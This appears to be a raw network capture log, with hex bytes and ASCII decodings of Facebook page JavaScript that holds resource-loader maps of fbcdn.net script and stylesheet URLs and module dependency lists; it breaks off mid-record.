                                                                                                                                  2022-10-17 20:07:09 UTC374INData Raw: 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 62 78 44 61 74 61 22 3a 7b 22 38 37 35 32 33 31 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 79 44 5c 2f 72 5c 2f 64 34 5a 49 56 58 2d 35 43 2d 62 2e 69 63 6f 22 7d 7d 2c 22 63 6c 70 44 61 74 61 22 3a 7b 22 31 37 34 36 33 39 37 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 7d 2c 22 67 6b 78 44 61 74 61 22 3a 7b 22 34 31 36 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 79 72 62 35 51 75 51 39 32 37 33 36 75 4b 65 49 22 7d 2c 22 35 38 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 42 2d 32 4b 65 48 31 67 4f 4f 56 66 4c 54
                                                                                                                                  Data Ascii: n(m){m.handle({"bxData":{"875231":{"uri":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/yD\/r\/d4ZIVX-5C-b.ico"}},"clpData":{"1746397":{"r":1,"s":1}},"gkxData":{"4166":{"result":false,"hash":"AT7yrb5QuQ92736uKeI"},"588":{"result":true,"hash":"AT7B-2KeH1gOOVfLT
                                                                                                                                  2022-10-17 20:07:09 UTC375INData Raw: 73 68 22 3a 22 41 54 36 64 49 42 69 56 76 39 62 55 44 58 6c 6d 48 77 63 22 7d 2c 22 31 39 38 35 39 34 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 36 36 4f 6f 35 6c 59 5f 5f 35 77 55 54 70 44 79 6b 22 7d 2c 22 35 35 34 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 30 56 2d 51 5f 7a 66 45 79 6b 7a 6e 4f 30 46 67 22 7d 2c 22 31 30 39 39 38 39 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 6b 6c 79 32 4c 53 5a 56 5f 44 4b 47 52 71 4e 59 22 7d 7d 2c 22 71 65 78 44 61 74 61 22 3a 7b 22 36 34 34 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 36 34 37 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 7d 2c 22 71 70 6c 44 61 74 61 22 3a 7b 22 38 39 31 22 3a 7b
                                                                                                                                  Data Ascii: sh":"AT6dIBiVv9bUDXlmHwc"},"1985945":{"result":true,"hash":"AT66Oo5lY__5wUTpDyk"},"5541":{"result":true,"hash":"AT70V-Q_zfEykznO0Fg"},"1099893":{"result":false,"hash":"AT5kly2LSZV_DKGRqNY"}},"qexData":{"644":{"r":null},"647":{"r":null}},"qplData":{"891":{
                                                                                                                                  2022-10-17 20:07:09 UTC377INData Raw: 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 67 5c 2f 72 5c 2f 6c 5f 64 45 45 6c 4a 69 42 43 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 52 30 72 48 69 64 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 47 5c 2f 72 5c 2f 2d 4d 45 4a 79 49 32 56 48 6e 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6a 54 58 64 48 33 65 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72
                                                                                                                                  Data Ascii: tic.xx.fbcdn.net\/rsrc.php\/v3\/yg\/r\/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz"},"R0rHidL":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yG\/r\/-MEJyI2VHno.js?_nc_x=Ij3Wp8lg5Kz"},"jTXdH3e":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsr
                                                                                                                                  2022-10-17 20:07:09 UTC378INData Raw: 79 43 5c 2f 72 5c 2f 65 47 61 68 6c 57 63 78 56 6c 6e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 65 4d 6b 4d 78 48 5a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 33 5c 2f 72 5c 2f 76 33 4b 46 49 61 6d 56 45 69 2d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 43 47 6b 48 34 46 59 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 5a 5c 2f 72 5c 2f 78 34 45 79 70 39 6e 51 31 75 6b 2e 6a 73
                                                                                                                                  Data Ascii: yC\/r\/eGahlWcxVln.js?_nc_x=Ij3Wp8lg5Kz"},"eMkMxHZ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y3\/r\/v3KFIamVEi-.js?_nc_x=Ij3Wp8lg5Kz"},"CGkH4FY":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yZ\/r\/x4Eyp9nQ1uk.js
                                                                                                                                  2022-10-17 20:07:09 UTC380INData Raw: 5c 2f 39 6a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 79 4e 59 63 63 35 65 43 6a 75 79 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6b 4b 56 74 4f 32 5c 2f 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 4d 6b 76 30 74 4e 30 49 66 53 75 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 49 47 35 79 4a 46 4d 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22
                                                                                                                                  Data Ascii: \/9j":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/yNYcc5eCjuy.js?_nc_x=Ij3Wp8lg5Kz"},"kKVtO2\/":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/Mkv0tN0IfSu.js?_nc_x=Ij3Wp8lg5Kz"},"IG5yJFM":{"type":"js","
                                                                                                                                  2022-10-17 20:07:09 UTC381INData Raw: 76 43 36 34 5c 2f 79 71 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 34 5a 6a 6d 33 64 75 5a 47 72 51 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 46 4a 76 47 4b 5c 2f 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4b 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 53 48 65 66 56 49 37 77 67 6a 2d 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 52 70 4d 75 38 48 64 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f
                                                                                                                                  Data Ascii: vC64\/yq\/l\/en_US\/4Zjm3duZGrQ.js?_nc_x=Ij3Wp8lg5Kz"},"FJvGK\/j":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yK\/l\/0,cross\/SHefVI7wgj-.css?_nc_x=Ij3Wp8lg5Kz"},"RpMu8Hd":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/
                                                                                                                                  2022-10-17 20:07:09 UTC382INData Raw: 39 6b 79 61 4b 52 58 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 69 46 75 50 62 57 68 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 61 5c 2f 72 5c 2f 72 39 78 53 54 75 71 4d 5f 4e 78 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 51 6b 6e 33 7a 4d 45 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 67 5c 2f 72 5c 2f 61 6d 4e 67 6f 45 76 54 41 72 56 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57
                                                                                                                                  Data Ascii: 9kyaKRX.js?_nc_x=Ij3Wp8lg5Kz"},"iFuPbWh":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ya\/r\/r9xSTuqM_Nx.js?_nc_x=Ij3Wp8lg5Kz"},"Qkn3zME":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yg\/r\/amNgoEvTArV.js?_nc_x=Ij3W
                                                                                                                                  2022-10-17 20:07:09 UTC384INData Raw: 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 33 4f 67 53 4a 45 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 5f 5c 2f 72 5c 2f 6a 69 58 4c 74 37 7a 61 4d 49 70 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 41 70 47 35 56 4b 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 49 5c 2f 72 5c 2f 4e 52 31 4d 44 44 57 4f 48 4c 64 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 33 53 2b 62 37
                                                                                                                                  Data Ascii: =Ij3Wp8lg5Kz"},"3OgSJE4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y_\/r\/jiXLt7zaMIp.js?_nc_x=Ij3Wp8lg5Kz"},"ApG5VK4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yI\/r\/NR1MDDWOHLd.js?_nc_x=Ij3Wp8lg5Kz"},"3S+b7
                                                                                                                                  2022-10-17 20:07:09 UTC385INData Raw: 7d 2c 22 47 72 78 57 58 32 65 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 64 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 50 76 56 7a 58 39 45 41 4b 46 61 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 39 37 58 39 45 72 36 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 46 61 33 34 5c 2f 79 32 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 47 77 4f 35 6e 70 54 75 39 53 2d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b
                                                                                                                                  Data Ascii: },"GrxWX2e":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/l\/0,cross\/PvVzX9EAKFa.css?_nc_x=Ij3Wp8lg5Kz"},"97X9Er6":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iFa34\/y2\/l\/en_US\/GwO5npTu9S-.js?_nc_x=Ij3Wp8lg5K
                                                                                                                                  2022-10-17 20:07:09 UTC387INData Raw: 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 57 46 4d 47 53 39 65 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 5f 6a 41 34 5c 2f 79 7a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 61 73 43 69 42 53 75 68 62 6a 75 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 43 71 52 43 4a 4b 6c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 49 6d 61 34 5c 2f 79 32 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 5a 56 30 65 47 52 4c 38 64 42 71 2e 6a 73 3f 5f 6e 63 5f 78
                                                                                                                                  Data Ascii: 3Wp8lg5Kz"},"WFMGS9e":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i_jA4\/yz\/l\/en_US\/asCiBSuhbju.js?_nc_x=Ij3Wp8lg5Kz"},"CqRCJKl":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iIma4\/y2\/l\/en_US\/ZV0eGRL8dBq.js?_nc_x
                                                                                                                                  2022-10-17 20:07:09 UTC388INData Raw: 22 78 32 32 4f 62 79 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 30 5c 2f 72 5c 2f 66 4e 33 63 43 6a 37 49 6c 34 44 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6f 45 34 44 6f 66 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4a 5c 2f 72 5c 2f 45 65 6a 41 67 6e 48 55 61 64 34 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 56 76 56 46 77 38 6e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73
                                                                                                                                  Data Ascii: "x22Oby4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y0\/r\/fN3cCj7Il4D.js?_nc_x=Ij3Wp8lg5Kz"},"oE4DofT":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yJ\/r\/EejAgnHUad4.js?_nc_x=Ij3Wp8lg5Kz"},"VvVFw8n":{"type":"js
                                                                                                                                  2022-10-17 20:07:09 UTC390INData Raw: 2c 22 72 68 32 4a 47 30 55 22 2c 22 68 79 4b 6d 70 75 75 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 2b 52 47 74 4d 30 6f 22 2c 22 6a 54 58 64 48 33 65 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 49 6e 70 75 74 22 3a 7b 22 72 22 3a 5b 22 5a 32 47 6a 56 75 39 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4c 69 76 65 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 32 5c 2f 6d 61 51 5c 2f 51 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 5c 2f 6f 35 59 76 4f 32 22 2c 22 68 79 4b 6d 70 75 75 22 5d 2c 22 62
                                                                                                                                  Data Ascii: ,"rh2JG0U","hyKmpuu"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED"],"r":["+RGtM0o","jTXdH3e"]},"be":1},"Input":{"r":["Z2GjVu9"],"be":1},"Live":{"r":["vcBcJjw","2\/maQ\/Q","e9ANzw\/","n6W4xMH","vGt2mxz","\/o5YvO2","hyKmpuu"],"b
                                                                                                                                  2022-10-17 20:07:09 UTC391INData Raw: 54 22 2c 22 32 47 70 61 6b 5c 2f 31 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 4b 68 62 44 71 4c 6d 22 2c 22 69 46 75 50 62 57 68 22 2c 22 51 6b 6e 33 7a 4d 45 22 2c 22 47 70 51 46 42 77 4c 22 2c 22 48 34 77 61 63 32 4e 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 78 4e 55 41 4f 72 46 22 2c 22 51 4d 54 46 61 33 6c 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 6a 54 58 64 48 33 65 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 35 56 78 43 64 34 48 22 2c 22 4d 49 53 44 50 42 4e 22 2c 22 5c 2f 6f 35 59 76 4f 32 22 2c 22 75 64 69 74 64 6f 71 22 2c 22 5a 38 7a 36 59 6f 30 22 2c 22 64 5a 76 4c 69 6b 68 22 2c 22 6e 4d 46 57 7a 4c 58 22 2c 22 59 76 33 35 4f 66 32 22 2c 22 48 4e 4a 6c 7a 30 66 22 2c 22 63 59 55 33 63 33 32 22 2c 22 33 4f 67 53 4a 45 34 22 2c 22 73 6a 43 51 65 7a 61 22 2c
                                                                                                                                  Data Ascii: T","2Gpak\/1","CGkH4FY","KhbDqLm","iFuPbWh","Qkn3zME","GpQFBwL","H4wac2N","lWOvGTa","xNUAOrF","QMTFa3l","n6W4xMH","jTXdH3e","vGt2mxz","5VxCd4H","MISDPBN","\/o5YvO2","uditdoq","Z8z6Yo0","dZvLikh","nMFWzLX","Yv35Of2","HNJlz0f","cYU3c32","3OgSJE4","sjCQeza",
                                                                                                                                  2022-10-17 20:07:09 UTC393INData Raw: 7a 65 72 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 74 6a 6d 6b 2b 30 4b 22 2c 22 38 34 31 43 72 56 36 22 2c 22 71 4b 4a 59 6f 61 44 22 2c 22 2b 52 47 74 4d 30 6f 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 43 71 52 43 4a 4b 6c 22 2c 22 78 33 39 30 4f 72 69 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 6a 54 58 64 48 33 65 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6e 4d 46 57 7a 4c 58 22 2c 22 73 6a 43 51 65 7a 61 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 41 63
                                                                                                                                  Data Ascii: zer":{"r":["vcBcJjw","tjmk+0K","841CrV6","qKJYoaD","+RGtM0o","PMEs\/oy","Z2GjVu9","hyKmpuu","CqRCJKl","x390Ori","lWOvGTa","jTXdH3e","vGt2mxz","nMFWzLX","sjCQeza"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"]},"be":1},"AsyncDialog":{"r":["vcBcJjw","Ac
                                                                                                                                  2022-10-17 20:07:09 UTC394INData Raw: 2c 22 6c 57 4f 76 47 54 61 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 6a 54 58 64 48 33 65 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 4d 49 53 44 50 42 4e 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 5a 45 43 34 52 72 51 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 41 39 63 69 56 42 39 22 2c 22 6f 5c 2f 75 6e 79 72 6e 22 2c 22 65 4d 6b 4d 78 48 5a 22 2c 22 55 66 71 36 59 57 58 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 45 78 63 65 70 74 69 6f 6e 44 69 61 6c 6f 67 22
                                                                                                                                  Data Ascii: ,"lWOvGTa","n6W4xMH","jTXdH3e","vGt2mxz","MISDPBN","R5w1rCJ","ZEC4RrQ","e9ANzw\/","A9ciVB9","o\/unyrn","eMkMxHZ","Ufq6YWX"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","Animation","PageTransitions","BanzaiScuba_DEPRECATED"]},"be":1},"ExceptionDialog"
                                                                                                                                  2022-10-17 20:07:09 UTC396INData Raw: 2c 22 6f 77 65 73 41 33 50 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 2b 52 47 74 4d 30 6f 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 42 6f 64 79 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a 77 22 2c 22 5c 2f 48 56 34 42 34 58 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 50 4d 45 73 5c 2f 6f 79 22 2c 22 4b 41 6a 62 72 6c 5c 2f 22 2c 22 6f 5c 2f 75 6e 79 72 6e 22 2c 22 59 76 33 35 4f 66 32 22 2c 22 73 6a 43 51 65 7a 61 22 2c 22 6f 77 65 73 41 33 50 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 46 6f 6f 74 65 72 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 76 63 42 63 4a 6a
                                                                                                                                  Data Ascii: ,"owesA3P"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"],"r":["+RGtM0o"]},"be":1},"XUIDialogBody.react":{"r":["vcBcJjw","\/HV4B4X","R5w1rCJ","PMEs\/oy","KAjbrl\/","o\/unyrn","Yv35Of2","sjCQeza","owesA3P"],"be":1},"XUIDialogFooter.react":{"r":["vcBcJj
                                                                                                                                  2022-10-17 20:07:09 UTC397INData Raw: 22 2c 22 50 5c 2f 6d 72 35 56 45 22 2c 22 5a 38 7a 36 59 6f 30 22 2c 22 63 68 58 77 50 72 55 22 5d 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 2c 22 53 65 72 76 65 72 4a 53 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 54 69 6d 65 53 6c 69 63 65 2c 53 65 72 76 65 72 4a 53 29 7b 76 61 72 20 73 3d 28 6e 65 77 20 53 65 72 76 65 72 4a 53 28 29 29 3b 73 2e 68 61 6e 64 6c 65 28 7b 22 64 65 66 69 6e 65 22 3a 5b 5b 22 4c 69 6e 6b 73 68 69 6d 48 61 6e 64 6c 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 75 70 70 6f 72 74 73 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 3a 74 72 75 65 2c 22 64 65 66 61 75 6c 74 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69
                                                                                                                                  Data Ascii: ","P\/mr5VE","Z8z6Yo0","chXwPrU"]);});</script><script>requireLazy(["TimeSliceImpl","ServerJS"],function(TimeSlice,ServerJS){var s=(new ServerJS());s.handle({"define":[["LinkshimHandlerConfig",[],{"supports_meta_referrer":true,"default_meta_referrer_poli
                                                                                                                                  2022-10-17 20:07:09 UTC399INData Raw: 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 33 5f 4a 43 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 65 58 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 79 5c 2f 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 36 5f 50 4b 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 66 41 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 48 6a 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 69 6d 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 74 46 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 78 74 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31
